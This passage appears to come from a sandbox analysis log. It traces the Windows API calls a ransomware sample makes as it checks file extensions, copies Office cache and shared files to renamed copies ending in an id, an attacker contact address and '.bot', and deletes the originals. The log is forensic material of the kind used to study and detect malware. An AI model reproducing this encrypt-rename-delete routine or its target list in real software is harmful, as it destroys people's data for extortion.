	[0034.540] lstrlenW (lpString=".pdf") returned 4
	[0034.540] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.540] lstrlenW (lpString=".xls") returned 4
	[0034.540] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.540] lstrlenW (lpString=".xlsx") returned 5
	[0034.540] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1
	[0034.540] lstrlenW (lpString=".ppt") returned 4
	[0034.540] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75
	[0034.540] lstrlenW (lpString=".zip") returned 4
	[0034.540] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.540] lstrlenW (lpString=".rar") returned 4
	[0034.540] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.540] lstrlenW (lpString=".bz2") returned 4
	[0034.540] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.540] lstrlenW (lpString=".7z") returned 3
	[0034.540] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75
	[0034.540] lstrlenW (lpString=".dbf") returned 4
	[0034.540] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75
	[0034.540] lstrlenW (lpString=".1cd") returned 4
	[0034.541] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75
	[0034.541] lstrlenW (lpString=".jpg") returned 4
	[0034.541] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.541] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0034.541] lstrlenW (lpString="AccessMUISet.xml") returned 16
	[0034.541] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac
	[0034.543] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=819) returned 1
	[0034.543] CloseHandle (hObject=0x1ac) returned 1
	[0034.543] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 0x2020
	[0034.543] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.543] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac
	[0034.543] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.543] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.543] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0034.544] GetLastError () returned 0x0
	[0034.544] ReadFile (in: hFile=0x1ac, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x333, lpOverlapped=0x0) returned 1
	[0035.361] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x340, lpOverlapped=0x0) returned 1
	[0035.362] ReadFile (in: hFile=0x1ac, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.362] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0035.362] SetEndOfFile (hFile=0x1b0) returned 1
	[0035.362] CloseHandle (hObject=0x1b0) returned 1
	[0035.364] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.364] SetEndOfFile (hFile=0x1ac) returned 1
	[0035.365] CloseHandle (hObject=0x1ac) returned 1
	[0035.365] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.365] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 1
	[0035.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79
	[0035.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79
	[0035.370] lstrlenW (lpString=".doc") returned 4
	[0035.370] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.370] lstrlenW (lpString=".docx") returned 5
	[0035.370] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1
	[0035.370] lstrlenW (lpString=".pdf") returned 4
	[0035.370] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.370] lstrlenW (lpString=".xls") returned 4
	[0035.370] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.370] lstrlenW (lpString=".xlsx") returned 5
	[0035.370] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1
	[0035.370] lstrlenW (lpString=".ppt") returned 4
	[0035.370] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79
	[0035.370] lstrlenW (lpString=".zip") returned 4
	[0035.370] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.370] lstrlenW (lpString=".rar") returned 4
	[0035.370] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.370] lstrlenW (lpString=".bz2") returned 4
	[0035.370] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.370] lstrlenW (lpString=".7z") returned 3
	[0035.370] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79
	[0035.370] lstrlenW (lpString=".dbf") returned 4
	[0035.370] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79
	[0035.371] lstrlenW (lpString=".1cd") returned 4
	[0035.371] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.371] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79
	[0035.371] lstrlenW (lpString=".jpg") returned 4
	[0035.371] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.371] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79
	[0035.371] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79
	[0035.371] lstrlenW (lpString=".doc") returned 4
	[0035.371] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.371] lstrlenW (lpString=".docx") returned 5
	[0035.371] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1
	[0035.371] lstrlenW (lpString=".pdf") returned 4
	[0035.371] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.371] lstrlenW (lpString=".xls") returned 4
	[0035.371] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.371] lstrlenW (lpString=".xlsx") returned 5
	[0035.371] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1
	[0035.371] lstrlenW (lpString=".ppt") returned 4
	[0035.371] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.371] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79
	[0035.371] lstrlenW (lpString=".zip") returned 4
	[0035.371] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.371] lstrlenW (lpString=".rar") returned 4
	[0035.371] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.371] lstrlenW (lpString=".bz2") returned 4
	[0035.371] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.371] lstrlenW (lpString=".7z") returned 3
	[0035.371] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.371] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79
	[0035.371] lstrlenW (lpString=".dbf") returned 4
	[0035.371] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.372] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79
	[0035.372] lstrlenW (lpString=".1cd") returned 4
	[0035.372] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.373] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79
	[0035.373] lstrlenW (lpString=".jpg") returned 4
	[0035.373] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.373] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.373] lstrlenW (lpString="Setup.xml") returned 9
	[0035.373] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.816] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=31094) returned 1
	[0035.816] CloseHandle (hObject=0x1a8) returned 1
	[0035.816] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0035.816] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.816] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.817] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.817] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.817] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0035.817] GetLastError () returned 0x0
	[0035.817] ReadFile (in: hFile=0x1a8, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x7976, lpOverlapped=0x0) returned 1
	[0035.941] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x7980, lpOverlapped=0x0) returned 1
	[0035.943] ReadFile (in: hFile=0x1a8, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.943] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0035.943] SetEndOfFile (hFile=0x190) returned 1
	[0035.943] CloseHandle (hObject=0x190) returned 1
	[0035.944] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.944] SetEndOfFile (hFile=0x1a8) returned 1
	[0035.945] CloseHandle (hObject=0x1a8) returned 1
	[0035.945] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.945] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0035.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.946] lstrlenW (lpString=".doc") returned 4
	[0035.946] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.946] lstrlenW (lpString=".docx") returned 5
	[0035.946] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0035.946] lstrlenW (lpString=".pdf") returned 4
	[0035.946] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.946] lstrlenW (lpString=".xls") returned 4
	[0035.946] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.946] lstrlenW (lpString=".xlsx") returned 5
	[0035.946] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0035.946] lstrlenW (lpString=".ppt") returned 4
	[0035.946] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.946] lstrlenW (lpString=".zip") returned 4
	[0035.946] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.946] lstrlenW (lpString=".rar") returned 4
	[0035.946] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.946] lstrlenW (lpString=".bz2") returned 4
	[0035.946] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.946] lstrlenW (lpString=".7z") returned 3
	[0035.946] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.946] lstrlenW (lpString=".dbf") returned 4
	[0035.946] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.946] lstrlenW (lpString=".1cd") returned 4
	[0035.946] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.946] lstrlenW (lpString=".jpg") returned 4
	[0035.946] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.946] lstrlenW (lpString=".doc") returned 4
	[0035.946] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.947] lstrlenW (lpString=".docx") returned 5
	[0035.947] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0035.947] lstrlenW (lpString=".pdf") returned 4
	[0035.947] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.947] lstrlenW (lpString=".xls") returned 4
	[0035.947] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.947] lstrlenW (lpString=".xlsx") returned 5
	[0035.947] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0035.947] lstrlenW (lpString=".ppt") returned 4
	[0035.947] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.947] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.947] lstrlenW (lpString=".zip") returned 4
	[0035.947] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.947] lstrlenW (lpString=".rar") returned 4
	[0035.947] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.947] lstrlenW (lpString=".bz2") returned 4
	[0035.947] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.947] lstrlenW (lpString=".7z") returned 3
	[0035.947] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.947] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.947] lstrlenW (lpString=".dbf") returned 4
	[0035.947] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.947] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.947] lstrlenW (lpString=".1cd") returned 4
	[0035.947] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.947] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.947] lstrlenW (lpString=".jpg") returned 4
	[0035.947] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.947] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0035.947] lstrlenW (lpString="boxed-split.avi") returned 15
	[0035.948] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.988] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=62976) returned 1
	[0035.989] CloseHandle (hObject=0x1a8) returned 1
	[0035.989] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20
	[0035.989] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.989] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0035.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0035.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0035.989] lstrlenW (lpString=".doc") returned 4
	[0035.989] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0035.989] lstrlenW (lpString=".docx") returned 5
	[0035.989] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0035.989] lstrlenW (lpString=".pdf") returned 4
	[0035.989] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0035.989] lstrlenW (lpString=".xls") returned 4
	[0035.989] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0035.989] lstrlenW (lpString=".xlsx") returned 5
	[0035.989] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0035.989] lstrlenW (lpString=".ppt") returned 4
	[0035.989] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0035.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0035.989] lstrlenW (lpString=".zip") returned 4
	[0035.989] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0035.989] lstrlenW (lpString=".rar") returned 4
	[0035.989] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0035.989] lstrlenW (lpString=".bz2") returned 4
	[0035.989] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0035.989] lstrlenW (lpString=".7z") returned 3
	[0035.989] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0035.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0035.989] lstrlenW (lpString=".dbf") returned 4
	[0035.990] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0035.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0035.990] lstrlenW (lpString=".1cd") returned 4
	[0035.990] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0035.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0035.990] lstrlenW (lpString=".jpg") returned 4
	[0035.990] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0035.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0035.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0035.990] lstrlenW (lpString=".doc") returned 4
	[0035.990] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0035.990] lstrlenW (lpString=".docx") returned 5
	[0035.990] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0035.990] lstrlenW (lpString=".pdf") returned 4
	[0035.990] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0035.990] lstrlenW (lpString=".xls") returned 4
	[0035.990] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0035.990] lstrlenW (lpString=".xlsx") returned 5
	[0035.990] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0035.990] lstrlenW (lpString=".ppt") returned 4
	[0035.990] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0035.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0035.990] lstrlenW (lpString=".zip") returned 4
	[0035.990] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0035.990] lstrlenW (lpString=".rar") returned 4
	[0035.990] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0035.990] lstrlenW (lpString=".bz2") returned 4
	[0035.990] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0035.990] lstrlenW (lpString=".7z") returned 3
	[0035.990] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0035.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0035.990] lstrlenW (lpString=".dbf") returned 4
	[0035.990] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0035.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0035.990] lstrlenW (lpString=".1cd") returned 4
	[0035.991] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0035.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0035.991] lstrlenW (lpString=".jpg") returned 4
	[0035.991] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0035.991] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0035.991] lstrlenW (lpString="join.avi") returned 8
	[0035.991] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
